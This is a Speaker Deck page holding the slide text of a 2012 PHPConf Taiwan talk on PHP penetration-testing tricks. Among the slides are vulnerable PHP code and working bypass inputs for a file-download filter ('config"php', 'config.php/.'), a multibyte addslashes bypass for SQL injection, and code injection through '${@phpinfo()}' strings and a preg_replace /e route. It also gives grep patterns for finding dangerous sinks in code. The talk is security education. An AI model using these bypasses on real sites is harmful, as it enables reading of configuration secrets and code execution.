Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Security in PHP 那些在滲透測試的小技巧

Orange
August 21, 2024
0
39

Security in PHP 那些在滲透測試的小技巧

PHPConf Taiwan 2012

Orange

August 21, 2024
Tweet

More Decks by Orange

See All by Orange
Best Practices - The Upload
p8361
0
21
網頁安全 Web Security 入門
p8361
0
52
Bug Bounty 獎金獵人甘苦談 - 那些年我回報過的漏洞
p8361
13
36k
那些 Web Hacking 中的奇技淫巧
p8361
16
14k
關於 HITCON CTF 的那些事 之 Web 狗如何在險惡的 CTF 世界中存活?
p8361
6
12k
PHPConf 2013 - 矛盾大對決
p8361
53
28k
0-Day 輕鬆談 - Happy Fuzzing Internet Explorer
p8361
15
12k
駭客看 Django
p8361
25
12k

Featured

See All Featured
How STYLIGHT went responsive
nonsquared
96
5.3k
Six Lessons from altMBA
skipperchong
27
3.6k
How to Think Like a Performance Engineer
csswizardry
22
1.3k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
19
2.3k
Designing for humans not robots
tammielis
250
25k
Building Applications with DynamoDB
mza
93
6.2k
ピンチをチャンスに:未来をつくるプロダクトロードマップ #pmconf2020
aki_iinuma
113
50k
A designer walks into a library…
pauljervisheath
205
24k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
98
18k
GitHub's CSS Performance
jonrohan
1030
460k
[Rails World 2023 - Day 1 Closing Keynote] - The Magic of Rails
eileencodes
33
2k
Statistics for Hackers
jakevdp
797
220k

Transcript

  1. 2012/11/03 @ PHPCONF <[email protected]>

  2. • aka Orange • 2009 • 2011 • 2011 AVTOKYO

    • – – Web Security – Windows Vulnerability Exploitation

  3. • CHROOT Security Group • NISRA • case. • Blog

    – http://blog.orange.tw/
  4. None
  5. None
  6. None

  7. ▪▪

  8. None

  9. <?php $url = $_GET['url']; echo urlencode( $url ); ?>

  10. • Low – Sensitive Information Leakage… • Middle – Insecure

    File Download/Access… • High – Local File Inclusion, Code Injection, SQL Inj…
  11. None

  12. • – – –

  13. • showNews.php?id=198 – showNews.php?id=198/1 • checkName.php?u=lala – checkName.php?u=lala%cc' • getFile.php?path=hsu.doc

    – getFile.php?path=./hsu.doc • main.php?module=index – main.php?module[]=index
  14. None
  15. None

  16. 1. Router, Controller URL Mapping 2. 3. 4. DB ORM

    PHP orz

  17. 1. – system exec shell_exec popen eval create_function call_user_func preg_replace…

    2. – _GET _POST _COOKIE _REQUEST _ENV _FILES _SERVER HTTP_RAW_POST_DATA php://input getenv …

  18. • grep -Re – (include|require).+\$ – (eval|create_function|call_user_func|…).+\$ – (system|exec|shell_exec|passthru|…).+\$ –

    (select|insert|update|where|…).+\$ – (file_get_contents|readfile|fopen|…).+\$ – (unserialize|parse_str|…).+\$ – \$\$, $a\(\) – ……

  19. • grep -Re – \$(_GET|_POST|_COOKIE|_REQUEST|_FILES) – \$(_ENV|_SERVER) – getenv –

    HTTP_RAW_POST_DATA – php://input – …

  20. try { …… $trans->commit(); } catch (xxx_adapter_exception $e) { $trans->rollback();

    require_once 'xxx_exceptio$n.class.php' throw new xxx_exception( …… ); }
  21. None
  22. None

  23. <?php $name = $_GET['name']; $name = basename( $name ); if

    ( eregi( "(.php|.conf)$", $name ) ) exit( "Not Allow PHP." ); else readfile( DOCUMENT_ROOT. $name ); ?>

  24. • down.php?name= – config.php – config"php – config.ph> – config.<

    – c>>>>>"< – c<"< Test on PHP 5.4.8 newest stable version (2012/10/17) Original Will be replaced by < * > ? " .
  25. None

  26. • file_get_contents – > php_stream_open_wrapper_ex – > zend_resolve_path – >

    php_resolve_path_for_zend – > php_resolve_path – > tsrm_realpath – > virtual_file_ex – > tsrm_realpath_r
  27. None

  28. • file_get_contents • file_put_contents • file • readfile • phar_file_get_contents

    • include • include_once • require • require_once • fopen • opendir • readdir • mkdir • ……
  29. None

  30. • config.php/. • config.php///. • c>>>>>.</// Works on PHP 5.2.*

    (2012/10/26)
  31. None

  32. • Web Browser PHP Output (HTML) – Cross-Site Scripting •

    DB Management PHP Output (SQL) – SQL Injection

  33. SELECT * FROM [table] WHERE username = 'PHPCONF'

  34. SELECT * FROM [table] WHERE username = 'PHPCONF\''

  35. SELECT * FROM [table] WHERE username = 'PHPCONF%cc\''

  36. Σ( ° △ °|||)︴ Before After PHPCONF PHPCONF PHPCONF' PHPCONF\'

    PHPCONF%80' PHPCONF�\' PHPCONF%cc' PHPCONF岤' 0x81-0xFE 0x40-0x7E 0xA1-0xFE

  37. • addslashes • mysql_escape_string • magic_quote_gpc • Special Cases –

    pdo – mysql_real_escape_st ring
  38. None

  39. • $url = "http://phpconf.tw/2012/"; • $url = "http://phpconf.tw/$year/"; • $url

    = "http://phpconf.tw/{$year}/"; • $url = "http://phpconf.tw/{${phpinfo()}}/"; • $url = "http://phpconf.tw/${@phpinfo()}/";

  40. config.php $dbuser = "root";

  41. config.php $dbuser = "${@phpinfo()}";

  42. $res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); https://orange.tw/index.php?s=module/action/ param1/${@phpinfo()}

  43. Think PHP

  44. None

  45. – – – – – –

  46. • PHP Security – http://blog.php-security.org/ • Oddities of PHP file

    access in Windows®. – http://onsec.ru/onsec.whitepaper-02.eng.pdf
  47. None